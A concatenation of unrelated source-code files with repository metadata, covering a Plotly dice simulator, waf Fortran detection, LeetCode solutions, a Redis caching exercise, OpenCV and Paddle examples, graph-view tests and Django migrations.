7c1956434714aa0adb907492eb23dcfe1ac80279 | 9f5c2728b1ab844bf3110cce78e4083283943ebb | /DataVisualization/chapter_15/dice_visual.py | dc0f108511ae1e6222c4a75f07bb80d88ee689de | [] | no_license | leetuckert10/CrashCourse | 9838448e75636132169498f152200651a05181c4 | 3f35958de497026da5e7d0d0a52fe3f20f2ef196 | refs/heads/master | 2023-05-01T11:56:27.382141 | 2020-04-02T19:11:07 | 2020-04-02T19:11:07 | 249,979,785 | 0 | 0 | null | 2023-04-21T20:48:10 | 2020-03-25T13:01:08 | Python | UTF-8 | Python | false | false | 1,857 | py | # dice_visual.py
# This version and the Die class have enhancements beyond what was laid out
# in Crash Course such that rolling multiple dice is made much easier. You
# only change the number of dice in one place.
from typing import List, Dict
from plotly.graph_objects import Bar, Layout # type: ignore
from plotly import offline # type: ignore
from die import Die
# Create multi-sided dice.
num_dice: int = 6
num_sides: int = 6
num_rolls: int = 500_000
max_result: int = 0
for x in range(1, num_dice + 1):
die = Die(num_sides)
max_result = max_result + die.num_sides
# We roll the number dice 1,000 times and then we store the sum of the dice
# in a list.
results: List[int] = []
result: int = 0
for roll in range(1, num_rolls + 1):
for die in Die.instances:
result = result + die.roll()
results.append(result)
result = 0
# Analyze the results. Bar() needs a list of values in the call to it.
frequencies: List[int] = []
for value in range(num_dice, max_result + 1):
frequencies.append(results.count(value))
# The sum of all sides is the maximum number that can be returned and the
# minimum number that can only be 1 times the number of dice.
# Convert the range of sides to a list for the call to Bar().
x_values: List[int] = list(range(num_dice, max_result + 1))
data: List[Bar] = [Bar(x=x_values, y=frequencies)]
# The 'dtick' dictionary argument tells Plotly to label every tick mark.
x_axis_config: Dict = {'title': 'Result', 'dtick': 1}
y_axis_config: Dict = {'title': 'Frequency of Result'}
title_str: str = f"Results of rolling {num_dice} D{num_sides} {num_rolls} " \
f"times."
my_layout: Layout = Layout(title=title_str, xaxis=x_axis_config,
yaxis=y_axis_config)
offline.plot({'data': data, 'layout': my_layout}, filename='d6_d6.html')
| [
"n4tlt.radio@gmail.com"
] | n4tlt.radio@gmail.com |
c16f345b9e70eca292351541d6fcb0f362b90723 | 2c4763aa544344a3a615f9a65d1ded7d0f59ae50 | /waflib/Tools/compiler_fc.py | a2a3032ab4e091a185ac288c0cd38ca181ebc167 | [] | no_license | afeldman/waf | 572bf95d6b11571bbb2941ba0fe463402b1e39f3 | 4c489b38fe1520ec1bc0fa7e1521f7129c20f8b6 | refs/heads/master | 2021-05-09T18:18:16.598191 | 2019-03-05T06:33:42 | 2019-03-05T06:33:42 | 58,713,085 | 0 | 0 | null | 2016-05-13T07:34:33 | 2016-05-13T07:34:33 | null | UTF-8 | Python | false | false | 2,235 | py | #!/usr/bin/env python
# encoding: utf-8
import re
from waflib import Utils, Logs
from waflib.Tools import fc
fc_compiler = {
'win32' : ['gfortran','ifort'],
'darwin' : ['gfortran', 'g95', 'ifort'],
'linux' : ['gfortran', 'g95', 'ifort'],
'java' : ['gfortran', 'g95', 'ifort'],
'default': ['gfortran'],
'aix' : ['gfortran']
}
"""
Dict mapping the platform names to lists of names of Fortran compilers to try, in order of preference::
from waflib.Tools.compiler_c import c_compiler
c_compiler['linux'] = ['gfortran', 'g95', 'ifort']
"""
def default_compilers():
build_platform = Utils.unversioned_sys_platform()
possible_compiler_list = fc_compiler.get(build_platform, fc_compiler['default'])
return ' '.join(possible_compiler_list)
def configure(conf):
"""
Detects a suitable Fortran compiler
:raises: :py:class:`waflib.Errors.ConfigurationError` when no suitable compiler is found
"""
try:
test_for_compiler = conf.options.check_fortran_compiler or default_compilers()
except AttributeError:
conf.fatal("Add options(opt): opt.load('compiler_fc')")
for compiler in re.split('[ ,]+', test_for_compiler):
conf.env.stash()
conf.start_msg('Checking for %r (Fortran compiler)' % compiler)
try:
conf.load(compiler)
except conf.errors.ConfigurationError as e:
conf.env.revert()
conf.end_msg(False)
Logs.debug('compiler_fortran: %r', e)
else:
if conf.env.FC:
conf.end_msg(conf.env.get_flat('FC'))
conf.env.COMPILER_FORTRAN = compiler
conf.env.commit()
break
conf.env.revert()
conf.end_msg(False)
else:
conf.fatal('could not configure a Fortran compiler!')
def options(opt):
"""
This is how to provide compiler preferences on the command-line::
$ waf configure --check-fortran-compiler=ifort
"""
test_for_compiler = default_compilers()
opt.load_special_tools('fc_*.py')
fortran_compiler_opts = opt.add_option_group('Configuration options')
fortran_compiler_opts.add_option('--check-fortran-compiler', default=None,
help='list of Fortran compiler to try [%s]' % test_for_compiler,
dest="check_fortran_compiler")
for x in test_for_compiler.split():
opt.load('%s' % x)
| [
"anton.feldmann@outlook.de"
] | anton.feldmann@outlook.de |
fbe16676768a4832f58e641a6e26c7336eb8ee39 | 321b4ed83b6874eeb512027eaa0b17b0daf3c289 | /1029/1029.two-city-scheduling.233252483.Accepted.leetcode.py | ff9ecc8ea5b98d76c93e827e263c8240e0de39b0 | [] | no_license | huangyingw/submissions | 7a610613bdb03f1223cdec5f6ccc4391149ca618 | bfac1238ecef8b03e54842b852f6fec111abedfa | refs/heads/master | 2023-07-25T09:56:46.814504 | 2023-07-16T07:38:36 | 2023-07-16T07:38:36 | 143,352,065 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 343 | py | class Solution(object):
def twoCitySchedCost(self, costs):
result = 0
costs = sorted(costs, key=lambda x: x[0] - x[1])
for index in range(len(costs)):
if index < len(costs) // 2:
result += costs[index][0]
else:
result += costs[index][1]
return result
| [
"huangyingw@gmail.com"
] | huangyingw@gmail.com |
8db86b66c9fff23e9398a22702a42bbb242c2967 | 8ef5a09d76a11c56963f18e6a08474a1a8bafe3c | /leet_code/371. Sum of Two Integers.py | de6f6d30d4cd6e9f11ea559e4459cd6409de9100 | [] | no_license | roiei/algo | 32c4677649c7666db148f6183fbfbf66c8b1969f | ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec | refs/heads/master | 2022-04-01T19:21:27.768675 | 2022-02-19T06:15:29 | 2022-02-19T06:15:29 | 169,021,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 585 | py | import time
from util.util_list import *
from util.util_tree import *
import copy
import collections
import heapq
from typing import List
class Solution:
def getSum(self, a: int, b: int) -> int:
while b != 0:
a = (a ^ b) & 0X1FFFFFFFF
b = ((a & b) << 1) & 0X1FFFFFFFF
if a < 0XFFFFFFFF:
return a
return ~((~a) & 0XFFFFFFFF)
stime = time.time()
print(3 == Solution().getSum(a = 1, b = 2))
print(1 == Solution().getSum(a = -2, b = 3))
print('elapse time: {} sec'.format(time.time() - stime))
| [
"hyoukjea.son@hyundai.com"
] | hyoukjea.son@hyundai.com |
341fc784d325d2865edbc349b267f8280aaf7129 | d2aae22870acefa1353dca86351ae94217d0f026 | /12.reinforcement_learning_with_mario_bros/2023/hard_coding/2.0.clustering_images.py | 952824e83fbf69324924dfe264774515a1224b4f | [
"MIT"
] | permissive | yingshaoxo/ML | 9c3169f2f8c7e98e0ad5ddc56fe81797a10df420 | 038fb5afe017b82334ad39a256531d2c4e9e1e1a | refs/heads/master | 2023-08-03T10:51:30.779007 | 2023-08-02T17:45:30 | 2023-08-02T17:45:30 | 137,086,679 | 5 | 1 | MIT | 2023-05-16T10:31:28 | 2018-06-12T14:49:58 | Python | UTF-8 | Python | false | false | 1,810 | py | from auto_everything.disk import Disk
disk = Disk()
from sewar.full_ref import msssim, uqi
import cv2
current_folder = disk.get_directory_path(__file__)
output_folder = disk.join_paths(current_folder, "seperated_classes")
disk.create_a_folder(output_folder)
#images = disk.get_files(folder=disk.join_paths(current_folder, "raw_seperate_images"))
images = disk.get_files(folder=disk.join_paths(current_folder, "raw_images"))
images_dict = {image_path:cv2.imread(image_path) for image_path in images}
relation_rate = 0.95
classes = {}
index = 0
for image_path_1 in list(images_dict.keys()).copy():
if image_path_1 not in images_dict.keys():
continue
image_1 = images_dict[image_path_1]
for image_path_2 in list(images_dict.keys()).copy():
if image_path_2 not in images_dict.keys():
continue
if image_path_1 != image_path_2:
image_2 = images_dict[image_path_2]
similarity = msssim(image_1, image_2)
# print(similarity)
if similarity >= relation_rate:
# print("found")
# print(image_path_1)
# print(image_path_2)
# exit()
if index not in classes.keys():
classes[index] = []
classes[index].append(image_path_2)
del images_dict[image_path_2]
if index in classes.keys():
classes[index].append(image_path_1)
del images_dict[image_path_1]
# copy images to related folder
for path in classes[index]:
disk.copy_a_file(path, disk.join_paths(output_folder, str(index), disk.get_file_name(path)) )
print(f"index {index} done.")
index += 1
else:
# finished
break
print("Done.") | [
"yingshaoxo@gmail.com"
] | yingshaoxo@gmail.com |
cafdf9e580d62bc12021c2f8ceb4516dfe36b24a | 3d0a2390047e0ede5df661255f6e72fab5d534f2 | /blog/urls.py | 9ddb0b0677e59536ec59685841269e5d21058474 | [] | no_license | sompodsign/Django_Personal_portfolio | 5f932e3ba27f802768735d6f91ef105ad168289a | 9e833a7728f46cd33c2f512a3840e70f49a2dd08 | refs/heads/master | 2022-12-12T01:59:14.770507 | 2020-08-31T07:45:41 | 2020-08-31T07:45:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py |
from django.urls import path
from blog import views
app_name = 'blog'
urlpatterns = [
path('', views.all_blogs, name='all_blogs'),
path('<int:blog_id>/', views.detail, name='detail'),
]
| [
"sompodsign@gmail.com"
] | sompodsign@gmail.com |
134719d8c196e98b85190c6ef8ddb801276374aa | 8acb7f5f98217fc3aacaaefa104c499627e90aae | /0x0B_redis_basic/exercise.py | cd0c1f852150144cd3eb35a5847e233b07baeb49 | [] | no_license | zulsb/holbertonschool-web_back_end | cb756386382eaaff373a37732247ca8d2c5f7a18 | 15931a555a28ed3bed5822d0f8b4b4c9a5f6a985 | refs/heads/main | 2023-05-06T00:52:40.278552 | 2021-05-22T21:33:15 | 2021-05-22T21:33:15 | 305,504,958 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,870 | py | #!/usr/bin/env python3
""" Redis module.
"""
import redis
import uuid
from functools import wraps
from sys import byteorder
from typing import Union, Optional, Callable
def count_calls(method: Callable) -> Callable:
""" Method that count calls.
"""
key = method.__qualname__
@wraps(method)
def wrapper(self, *args, **keywords):
""" Method wrapper.
"""
self._redis.incr(key)
return method(self, *args, **keywords)
return wrapper
def call_history(method: Callable) -> Callable:
""" Method that store the history of inputs and outputs
for a particular function.
"""
key = method.__qualname__
@wraps(method)
def wrapper(self, *args):
""" Method wrapper.
"""
self._redis.rpush("{}:inputs".format(key), str(args))
history = method(self, *args)
self._redis.rpush("{}:outputs".format(key),
str(history))
return history
return wrapper
def replay(method: Callable):
""" Method that display the history of calls
of a particular function.
"""
r = method.__self__._redis
keys = method.__qualname__
inputs = r.lrange("{}:inputs".format(keys), 0, -1)
outputs = r.lrange("{}:outputs".format(keys), 0, -1)
print("{} was called {} times:".format(keys,
r.get(keys).decode("utf-8")))
for i, j in list(zip(inputs, outputs)):
print("{}(*{}) -> {}".format(keys, i.decode("utf-8"),
j.decode("utf-8")))
class Cache:
""" Cache class.
"""
def __init__(self):
""" Initializer.
"""
self._redis = redis.Redis()
self._redis.flushdb()
@count_calls
@call_history
def store(self, data: Union[str, bytes, int, float]) -> str:
""" Method that generate a random key,
store the input data in Redis using the random key.
Arg:
data: Can be a str, bytes, int or float.
Return:
The key as string.
"""
key = str(uuid.uuid4())
self._redis.set(key, data)
return key
def get(self, key: str, fn: Optional[Callable] = None):
""" This callable will be used to convert
the data back to the desired format.
Args:
key: string type.
fn: Optional[Callable].
Return:
The convert data.
"""
data = self._redis.get(key)
return fn(data) if fn else data
def get_str(self, data: bytes) -> str:
""" Method that get a string from bytes.
"""
return data.decode("utf-8")
def get_int(self, data: bytes) -> int:
""" Method that get a int from bytes.
"""
return int.from_bytes(data, byteorder)
| [
"zulsb2093@gmail.com"
] | zulsb2093@gmail.com |
a7735f2687501d0c866a019685343953dd831d98 | aca209472c7288d69adf57124c197baf98c7a6e7 | /OpenCV讀者資源/讀者資源/程式實例/ch9/ch9_12.py | 100c8a3ac4fffab2f56bfd9d003d3496ab4b1ea9 | [] | no_license | Hank-Liao-Yu-Chih/document | 712790325e48b9d8115d04b5cc2a90cd78431e61 | fafe616678cd224e70936296962dcdbbf55e38b3 | refs/heads/master | 2022-09-22T12:40:33.284033 | 2022-09-08T00:33:41 | 2022-09-08T00:33:41 | 102,203,601 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | # ch9_12.py
import cv2
import numpy as np
thresh = 127 # 定義閾值
maxval = 255 # 定義像素最大值
src = np.random.randint(0,256,size=[3,5],dtype=np.uint8)
ret, dst = cv2.threshold(src,thresh,maxval,cv2.THRESH_TOZERO)
print(f"src =\n {src}")
print(f"threshold = {ret}")
print(f"dst =\n {dst}")
| [
"hank.liao@vicorelogic.com"
] | hank.liao@vicorelogic.com |
ffd1dd4408a8e7560f6281565bad2cef09a337d5 | 56cce3fee2e3d69d60958eb2aacc4f65fc3d2230 | /tests/test_graph_view.py | 2bcd8da7e69e4d68de3118a177d781ae621ceca7 | [
"BSD-3-Clause"
] | permissive | nokia/PyBGL | 52c2f175d1dbccb15519f8a16de141845d0abaf3 | 707f2df32ede7d9a992ea217a4791da34f13e138 | refs/heads/master | 2023-08-08T04:46:24.931627 | 2023-08-03T16:31:35 | 2023-08-03T16:31:35 | 148,536,169 | 12 | 3 | BSD-3-Clause | 2023-08-03T16:31:36 | 2018-09-12T20:11:36 | Python | UTF-8 | Python | false | false | 3,228 | py | #!/usr/bin/env pytest-3
# -*- coding: utf-8 -*-
from pybgl.graph import DirectedGraph
from pybgl.graph_view import GraphView
from pybgl.html import html
from pybgl.ipynb import ipynb_display_graph
from pybgl.property_map import make_func_property_map
def make_graph() -> DirectedGraph:
g = DirectedGraph(10)
for u in g.vertices():
if u < g.num_vertices() - 1:
g.add_edge(u, u + 1)
return g
def test_graph_view_default():
print("test_graph_view_default")
g = make_graph()
gv = GraphView(g)
e = next(iter(gv.edges()))
print(e)
assert gv.source(e) == 0
assert gv.target(e) == 1
html("gv")
ipynb_display_graph(gv)
assert set(g.vertices()) == set(gv.vertices())
assert set(g.edges()) == set(gv.edges())
assert set(g.out_edges(0)) == set(gv.out_edges(0))
assert g.out_degree(0) == gv.out_degree(0)
gv1 = GraphView(
g,
pmap_vrelevant=make_func_property_map(
lambda u: bool(u % 3 != 0)
)
)
html("gv1")
ipynb_display_graph(gv1)
assert gv1.num_vertices() == 6
assert gv1.num_edges() == 3
gv2 = GraphView(
g,
pmap_erelevant=make_func_property_map(
lambda e: bool(gv.source(e) % 2)
)
)
html("gv2")
ipynb_display_graph(gv2)
assert set(g.vertices()) == set(gv2.vertices())
assert set(g.edges()) != set(gv2.edges())
assert gv2.num_vertices() == g.num_vertices()
assert gv2.num_edges() == 4
def test_graph_view_or():
print("test_graph_view_or")
g = make_graph()
gv1 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u < 5))
gv2 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u > 5))
gv = gv1 | gv2
html("gv1")
ipynb_display_graph(gv1)
html("gv2")
ipynb_display_graph(gv2)
html("gv1 | gv2")
ipynb_display_graph(gv)
assert gv.num_vertices() == 9
assert gv.num_edges() == 7
def test_graph_view_and():
g = make_graph()
gv1 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u > 2))
gv2 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u < 6))
gv = gv1 & gv2
html("gv1")
ipynb_display_graph(gv1)
html("gv2")
ipynb_display_graph(gv2)
html("gv1 & gv2")
ipynb_display_graph(gv)
assert set(g.vertices()) != set(gv.vertices())
assert set(g.edges()) != set(gv.edges())
assert set(g.out_edges(2)) != set(gv.out_edges(2))
assert set(g.out_edges(3)) == set(gv.out_edges(3))
assert set(g.out_edges(4)) == set(gv.out_edges(4))
assert set(g.out_edges(5)) != set(gv.out_edges(5))
assert gv.num_vertices() == 3
assert gv.num_edges() == 2
def test_graph_view_sub():
g = make_graph()
gv1 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u > 2))
gv2 = GraphView(g, pmap_vrelevant=make_func_property_map(lambda u: u > 6))
gv = gv1 - gv2
html("gv1")
ipynb_display_graph(gv1)
html("gv2")
ipynb_display_graph(gv2)
html("gv1 - gv2")
ipynb_display_graph(gv)
assert set(g.vertices()) != set(gv.vertices())
assert set(g.edges()) != set(gv.edges())
assert gv.num_vertices() == 4
assert gv.num_edges() == 3
| [
"marc-olivier.buob@nokia-bell-labs.com"
] | marc-olivier.buob@nokia-bell-labs.com |
99575b5054b6865d2ef7c17006529adf4923af07 | b683c8f1942a1ab35062620c6013b1e223c09e92 | /Python-Files/Day-3/Question-10.py | 726a1add98af17a4907c45fa6b21b3af0c4245a1 | [] | no_license | nihathalici/Break-The-Ice-With-Python | 601e1c0f040e02fe64103c77795deb2a5d8ff00a | ef5b9dd961e8e0802eee171f2d54cdb92f2fdbe8 | refs/heads/main | 2023-07-18T01:13:27.277935 | 2021-08-27T08:19:44 | 2021-08-27T08:19:44 | 377,414,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 722 | py | """
Question 10
Question
Write a program that accepts a sequence of whitespace separated words as input and
prints the words after removing all duplicate words and sorting them alphanumerically.
Suppose the following input is supplied to the program:
hello world and practice makes perfect and hello world again
Then, the output should be:
again and hello makes perfect practice world
Hints:
In case of input data being supplied to the question, it should be assumed to be a console input.We use set container to remove duplicated data automatically and then use sorted() to sort the data.
"""
word = input().split()
for i in word:
if word.count(i) > 1:
word.remove(i)
word.sort()
print(" ".join(word))
| [
"noreply@github.com"
] | nihathalici.noreply@github.com |
b7f8fb45004f490bc91705b637f9448cc14d0759 | be84495751737bbf0a8b7d8db2fb737cbd9c297c | /sdl/strs.py | a1108190826b28e5da74d01537208ba9591cddbd | [] | no_license | mario007/renmas | 5e38ff66cffb27b3edc59e95b7cf88906ccc03c9 | bfb4e1defc88eb514e58bdff7082d722fc885e64 | refs/heads/master | 2021-01-10T21:29:35.019792 | 2014-08-17T19:11:51 | 2014-08-17T19:11:51 | 1,688,798 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,024 | py |
class Attribute:
"""
Class represents attribute(filed) in structure.
"""
def __init__(self, name, path):
self.name = name # name of struct
self.path = path # path to member in struct
class Callable:
"""
Class represents function in shading language.
"""
def __init__(self, name, args):
self.name = name
self.args = args
class Const:
"""
Class represents constant(int, float).
Also const can hold tuple of constants.
"""
def __init__(self, const):
self.const = const
class Name:
"""
Class represents name(variable) in shading language.
"""
def __init__(self, name):
self.name = name
class Subscript:
"""
Class represents item in array.
"""
def __init__(self, name, index, path=None):
self.name = name
self.index = index
#if we have path than this is array in struct
self.path = path # path to member in struct
class NoOp:
"""
In arithmetic and conditions, with this class we indicate that we are
missing left or right operand.
"""
pass
class Operation:
"""
Class that represent simple arithmetic operation.
"""
def __init__(self, left, operator, right):
self.left = left
self.operator = operator
self.right = right
class Operations:
"""
Class that holds list of arithmetic operations.
"""
def __init__(self, operations):
self.operations = operations
class Condition:
"""
Class that one simple logic condition
"""
def __init__(self, left, operator, right):
self.left = left
self.operator = operator
self.right = right
class Conditions:
"""
Class that holds list of logic conditions.
"""
def __init__(self, conditions, logic_ops):
assert len(conditions) == len(logic_ops) + 1
self.conditions = conditions
self.logic_ops = logic_ops
| [
"mvidov@yahoo.com"
] | mvidov@yahoo.com |
4af5f80e69b143b0cc55b7068cfba069e26fd17c | cdf969cadf53489b9c3d96a122232de947abc8a6 | /compute_video_frames_info.py | e0f4240fdcd0c6f26667fe0b5e9c9b40a39172b4 | [] | no_license | achalddave/charades-scripts | 021a0d2f2d2d4f41ba2c43fedf24b080c848ae34 | 9ec5bb3f1197a65a5a140242ba24a2c40074c8f4 | refs/heads/master | 2021-01-01T16:18:41.139194 | 2017-07-20T07:41:34 | 2017-07-20T07:41:34 | 97,805,792 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,566 | py | """Output frames per second, number of frames for each video.
Output is a CSV file containing the entries
video,fps,num_frames
where video is the name of the video file without the extension.
"""
import argparse
import csv
import os
from moviepy.editor import VideoFileClip
from tqdm import tqdm
def main(video_paths_list, output_csv_path):
with open(video_paths_list) as f:
video_paths = [line.strip() for line in f]
with open(output_csv_path, 'w') as output:
field_names = ['video', 'fps', 'num_frames']
writer = csv.DictWriter(output, fieldnames=field_names)
writer.writeheader()
for video_path in tqdm(video_paths):
clip = VideoFileClip(video_path)
frames_per_second = clip.fps
num_frames = int(clip.fps * clip.duration)
file_basename = os.path.splitext(os.path.basename(video_path))[0]
writer.writerow({'video': file_basename,
'fps': frames_per_second,
'num_frames': num_frames})
if __name__ == "__main__":
# Use first line of file docstring as description if a file docstring
# exists.
parser = argparse.ArgumentParser(
description=__doc__.split('\n')[0] if __doc__ else '',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'video_list',
help='File containing new-line separated paths to videos.')
parser.add_argument('output_csv')
args = parser.parse_args()
main(args.video_list, args.output_csv)
| [
"achalddave@live.com"
] | achalddave@live.com |
c7654bcbf74e5ac7a50f79cc4d50fe959e0ae817 | a25aa09af984d08084a395f9b6df427d3756f11a | /diary/0826.py | 8dea9397a029b60bffa7bed54f684ceab3cd8574 | [] | no_license | luyihsien/leetcodepy | 31971e851a4ae77942a5d9e3ff07faea6e504c66 | a54bd09f4b28f106196a6cd8a0f9c056bcd237e6 | refs/heads/master | 2020-05-19T13:21:57.854086 | 2019-10-16T14:23:00 | 2019-10-16T14:23:00 | 185,037,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 778 | py | import sys
a=[1,2,3,4]
print(id(a))
b=a
b=b+[5]
b.append(5)
print(a,id(a))
print(b,id(b))
a=5
b=a
print(id(a),id(b))
b+=1
print(id(b))
print(id(a))
print(a,b)
class ListNode:
def __init__(self,val):
self.val=val
self.next=None
a=ListNode(5)
b=a
print(sys.getsizeof(a))
print(sys.getsizeof(a.val))
print(sys.getsizeof(a.next))
b.next=ListNode(400000)
print(sys.getsizeof(a))
print(sys.getsizeof(a.next.val))
b=b.next
print('b',sys.getsizeof(b))
b.next=ListNode(3000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
print(sys.getsizeof(a))
a=100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
print(sys.getsizeof(a))
a=1000#與a=1同
print(sys.getsizeof(a)) | [
"luyihsien@gmail.com"
] | luyihsien@gmail.com |
421d09d35a9eb0d59a9fb4ec23cb7ad8804bd30a | 9f2f386a692a6ddeb7670812d1395a0b0009dad9 | /python/paddle/fluid/tests/unittests/test_softmax_mask_fuse_upper_triangle_op.py | a73ebd73e4946caa50030b52544a3c5a35a5c8d2 | [
"Apache-2.0"
] | permissive | sandyhouse/Paddle | 2f866bf1993a036564986e5140e69e77674b8ff5 | 86e0b07fe7ee6442ccda0aa234bd690a3be2cffa | refs/heads/develop | 2023-08-16T22:59:28.165742 | 2022-06-03T05:23:39 | 2022-06-03T05:23:39 | 181,423,712 | 0 | 7 | Apache-2.0 | 2022-08-15T08:46:04 | 2019-04-15T06:15:22 | C++ | UTF-8 | Python | false | false | 4,087 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle.fluid.core as core
from op_test import OpTest
import paddle
import paddle.fluid as fluid
import paddle.incubate as incubate
paddle.enable_static()
def _get_softmax_upper(x, fp16=True):
x_lower = np.tril(x)
masked_x = np.where(x_lower == 0, -10000.0, x_lower).astype("float32")
max_value = np.max(masked_x, axis=-1, keepdims=True)
before_exp = masked_x - max_value
exp = np.exp(before_exp)
exp_sum = np.sum(exp, axis=-1, keepdims=True)
rst = exp / exp_sum
if fp16:
rst = rst.astype("float16")
return rst
@unittest.skipIf(not core.is_compiled_with_cuda(),
"core is not compiled with CUDA")
class TestSoftmaxMaskFuseOp(OpTest):
def setUp(self):
self.op_type = "fused_softmax_mask_upper_triangle"
x = np.random.random((1, 4, 32, 32)).astype("float16")
self.inputs = {'X': x}
rst = _get_softmax_upper(x)
self.outputs = {'Out': rst}
def test_check_output(self):
self.check_output_with_place(core.CUDAPlace(0))
def test_check_grad(self):
self.check_grad_with_place(core.CUDAPlace(0), ["X"], "Out")
@unittest.skipIf(not core.is_compiled_with_cuda(),
"core is not compiled with CUDA")
class TestSoftmaxMaskFuseOp1(OpTest):
def setUp(self):
self.op_type = "fused_softmax_mask_upper_triangle"
x = np.random.random((1, 4, 32, 32))
self.inputs = {'X': x}
rst = _get_softmax_upper(x)
self.outputs = {'Out': rst}
def test_check_output(self):
try:
self.check_output_with_place(core.CPUPlace())
except NotImplementedError:
pass
def test_check_grad(self):
try:
self.check_grad_with_place(core.CPUPlace(), ["X"], "Out")
except NotImplementedError:
pass
@unittest.skipIf(not core.is_compiled_with_cuda(),
"core is not compiled with CUDA")
class TestDropoutBiasFuseOp2(unittest.TestCase):
# test the python side API for softmax_mask_fuse op
def setUp(self):
np.random.seed(123)
self.dtypes = ['float16', 'float32']
def test_static(self):
for dtype in self.dtypes:
with fluid.program_guard(fluid.Program(), fluid.Program()):
input_x = fluid.data(
name="x", shape=[1, 4, 32, 32], dtype=dtype)
rst = incubate.softmax_mask_fuse_upper_triangle(input_x)
x_in_np = np.random.random((1, 4, 32, 32)).astype(dtype)
rst_np = _get_softmax_upper(x_in_np, dtype == 'float16')
exe = fluid.Executor(fluid.CUDAPlace(0))
fetches = exe.run(fluid.default_main_program(),
feed={"x": x_in_np},
fetch_list=[rst])
self.assertTrue(np.allclose(fetches[0], rst_np))
def test_dygraph(self):
for dtype in self.dtypes:
with fluid.dygraph.guard(fluid.CUDAPlace(0)):
x_in_np = np.random.random((1, 4, 32, 32)).astype(dtype)
rst_np = _get_softmax_upper(x_in_np, dtype == 'float16')
input_x = fluid.dygraph.to_variable(x_in_np)
rst = incubate.softmax_mask_fuse_upper_triangle(input_x)
self.assertTrue(np.allclose(rst, rst_np))
if __name__ == '__main__':
unittest.main()
| [
"noreply@github.com"
] | sandyhouse.noreply@github.com |
c0a1cc5932507c02c45d2174440b4aa654fad2f9 | f7abecb2826760ce2ce6d022bd2d2225efd5416d | /company/migrations/0002_auto_20180323_1956.py | bab0547c5b00f2cdb63b4bc65d8061f5c712c85f | [] | no_license | vintkor/django_ppf | 2b8e20a016314e6934ccdb2e6723faf7e62a66b4 | 50737517049fdc806ecd3e2fc7757588e7cfcb7b | refs/heads/master | 2022-12-09T12:37:24.508027 | 2020-04-06T20:23:44 | 2020-04-06T20:23:44 | 112,515,920 | 0 | 1 | null | 2022-12-01T22:24:06 | 2017-11-29T19:03:53 | Python | UTF-8 | Python | false | false | 2,982 | py | # Generated by Django 2.0.3 on 2018-03-23 17:56
from django.db import migrations, models
import django.db.models.deletion
import sorl.thumbnail.fields
class Migration(migrations.Migration):
dependencies = [
('company', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Gallery',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),
('image', sorl.thumbnail.fields.ImageField(upload_to='images', verbose_name='Изображение')),
('alt', models.CharField(blank=True, max_length=255, null=True, verbose_name='SEO Alt')),
],
options={
'verbose_name': 'Office gallery',
'verbose_name_plural': 'Office galleries',
},
),
migrations.RemoveField(
model_name='officegallery',
name='office',
),
migrations.AlterModelOptions(
name='company',
options={'verbose_name': 'Компания', 'verbose_name_plural': 'Компании'},
),
migrations.AlterModelOptions(
name='office',
options={'verbose_name': 'Офис', 'verbose_name_plural': 'Офисы'},
),
migrations.RemoveField(
model_name='company',
name='logo',
),
migrations.AlterField(
model_name='company',
name='name',
field=models.CharField(max_length=250, verbose_name='Название компании'),
),
migrations.AlterField(
model_name='office',
name='address',
field=models.CharField(max_length=255, verbose_name='Адрес'),
),
migrations.AlterField(
model_name='office',
name='company',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='company.Company', verbose_name='Компания'),
),
migrations.AlterField(
model_name='office',
name='coordinates',
field=models.CharField(max_length=50, verbose_name='Координаты'),
),
migrations.AlterField(
model_name='office',
name='region',
field=models.ForeignKey(on_delete=None, to='geo.Region', verbose_name='Страна'),
),
migrations.DeleteModel(
name='OfficeGallery',
),
migrations.AddField(
model_name='gallery',
name='office',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='company.Office', verbose_name='Офис'),
),
]
| [
"alkv84@yandex.ru"
] | alkv84@yandex.ru |
